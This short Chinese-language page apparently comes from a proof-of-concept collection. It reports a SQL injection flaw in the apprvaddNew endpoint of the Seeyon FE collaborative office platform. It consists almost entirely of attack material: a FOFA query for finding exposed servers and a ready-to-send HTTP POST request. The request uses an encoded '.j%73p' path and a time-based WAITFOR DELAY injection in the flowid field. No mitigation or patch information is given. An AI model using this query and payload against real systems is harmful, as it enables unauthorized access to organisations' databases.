跳到主要内容

致远互联FE协作办公平台apprvaddNew存在sql注入漏洞

fofa

title="FE协作办公平台" || body="li_plugins_download"

poc

POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
Content-Type:application/x-www-form-urlencoded

flowid=1';WAITFOR+DELAY+'0:0:5'--+---

image-20240801195718315